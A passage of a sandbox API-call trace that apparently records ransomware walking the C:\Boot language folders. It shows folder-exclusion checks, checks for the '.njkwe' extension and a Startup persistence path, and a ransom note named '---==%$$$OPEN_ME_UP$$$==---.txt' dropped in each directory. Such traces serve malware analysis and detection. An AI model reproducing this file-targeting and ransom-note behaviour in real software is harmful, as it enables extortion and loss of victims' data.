lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12960, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0065.207] FindClose (in: hFindFile=0xc1a1e0 | out: hFindFile=0xc1a1e0) returned 1 [0065.207] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ro-RO\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.207] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ro-RO\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\ro-ro\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.207] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.208] CloseHandle (hObject=0x428) returned 1 [0065.208] GetProcessHeap () returned 0xbe0000 [0065.208] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.208] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef698608, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0065.208] lstrcmpiW (lpString1="ru-RU", lpString2="Windows") returned -1 [0065.208] lstrcmpiW (lpString1="ru-RU", lpString2="$Recycle.bin") returned 1 [0065.208] lstrcmpiW (lpString1="ru-RU", lpString2="System Volume Information") returned -1 [0065.208] lstrcmpiW (lpString1="ru-RU", lpString2="Program Files") returned 1 [0065.208] lstrcmpiW (lpString1="ru-RU", lpString2="Program Files (x86)") returned 1 [0065.208] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU") returned 17 [0065.208] lstrcmpW (lpString1="ru-RU", lpString2=".") returned 1 [0065.208] lstrcmpW (lpString1="ru-RU", lpString2="..") returned 1 [0065.208] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\ru-RU", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.208] GetProcessHeap () returned 0xbe0000 [0065.208] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.208] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\*") returned 19 [0065.208] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ru-RU\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef698608, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ca0 [0065.209] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.209] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.209] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.209] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.209] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.209] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\.") returned 19 [0065.209] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.209] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef698608, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.209] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.209] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.209] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.209] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.209] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.209] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\..") returned 20 [0065.209] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.209] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.209] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.210] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.210] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.210] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.210] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.210] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.210] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 33 [0065.210] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.210] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.210] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.210] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.210] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.210] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f699a6, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0065.210] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0065.210] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.210] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0065.210] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0065.210] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.210] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\memtest.exe.mui") returned 33 [0065.210] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.210] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.210] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0065.210] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\ru-RU\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.210] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\memtest.exe.mui" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.210] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f699a6, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0065.210] FindClose (in: hFindFile=0xc19ca0 | out: hFindFile=0xc19ca0) returned 1 [0065.210] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.210] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\ru-ru\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.213] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.214] CloseHandle (hObject=0x428) returned 1 [0065.214] GetProcessHeap () returned 0xbe0000 [0065.214] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.214] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0065.214] lstrcmpiW (lpString1="sk-SK", lpString2="Windows") returned -1 [0065.214] lstrcmpiW (lpString1="sk-SK", lpString2="$Recycle.bin") returned 1 [0065.214] lstrcmpiW (lpString1="sk-SK", lpString2="System Volume Information") returned -1 [0065.214] lstrcmpiW (lpString1="sk-SK", lpString2="Program Files") returned 1 [0065.214] lstrcmpiW (lpString1="sk-SK", lpString2="Program Files (x86)") returned 1 [0065.214] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sk-SK") returned 17 [0065.214] lstrcmpW (lpString1="sk-SK", lpString2=".") returned 1 [0065.214] lstrcmpW (lpString1="sk-SK", lpString2="..") returned 1 [0065.214] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\sk-SK", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.214] GetProcessHeap () returned 0xbe0000 [0065.214] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.214] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\sk-SK\\*") returned 19 [0065.214] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sk-SK\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19f20 [0065.214] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.214] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.214] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.214] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.215] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.215] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sk-SK\\.") returned 19 [0065.215] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.215] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.215] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.215] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.215] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.215] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.215] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.215] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sk-SK\\..") returned 20 [0065.215] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.215] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.215] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d58, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.215] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.215] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.215] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.215] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.215] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.215] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sk-SK\\bootmgr.exe.mui") returned 33 [0065.215] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.215] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.215] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.215] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\sk-SK\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.215] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sk-SK\\bootmgr.exe.mui" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.221] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d58, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0065.221] FindClose (in: hFindFile=0xc19f20 | out: hFindFile=0xc19f20) returned 1 [0065.221] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sk-SK\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.221] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sk-SK\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\sk-sk\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.221] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.222] CloseHandle (hObject=0x428) returned 1 [0065.222] GetProcessHeap () returned 0xbe0000 [0065.222] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.222] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0065.222] lstrcmpiW (lpString1="sl-SI", lpString2="Windows") returned -1 [0065.222] lstrcmpiW (lpString1="sl-SI", lpString2="$Recycle.bin") returned 1 [0065.222] lstrcmpiW (lpString1="sl-SI", lpString2="System Volume Information") returned -1 [0065.222] lstrcmpiW (lpString1="sl-SI", lpString2="Program Files") returned 1 [0065.222] lstrcmpiW (lpString1="sl-SI", lpString2="Program Files (x86)") returned 1 [0065.222] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sl-SI") returned 17 [0065.222] lstrcmpW (lpString1="sl-SI", lpString2=".") returned 1 [0065.222] lstrcmpW (lpString1="sl-SI", lpString2="..") returned 1 [0065.222] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\sl-SI", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.222] GetProcessHeap () returned 0xbe0000 [0065.222] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.222] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\sl-SI\\*") returned 19 [0065.222] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sl-SI\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a2e0 [0065.223] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.223] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.223] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.223] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.223] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.223] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sl-SI\\.") returned 19 [0065.223] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.223] FindNextFileW (in: hFindFile=0xc1a2e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.223] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.223] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.223] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.223] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.223] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.223] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sl-SI\\..") returned 20 [0065.223] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.223] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.223] FindNextFileW (in: hFindFile=0xc1a2e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.223] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.223] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.223] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.223] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.223] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.223] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sl-SI\\bootmgr.exe.mui") returned 33 [0065.223] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.223] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.223] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.223] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\sl-SI\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.223] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sl-SI\\bootmgr.exe.mui" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.223] FindNextFileW (in: hFindFile=0xc1a2e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0065.223] FindClose (in: hFindFile=0xc1a2e0 | out: hFindFile=0xc1a2e0) returned 1 [0065.224] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sl-SI\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.224] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sl-SI\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\sl-si\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.224] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.225] CloseHandle (hObject=0x428) returned 1 [0065.225] GetProcessHeap () returned 0xbe0000 [0065.225] HeapFree 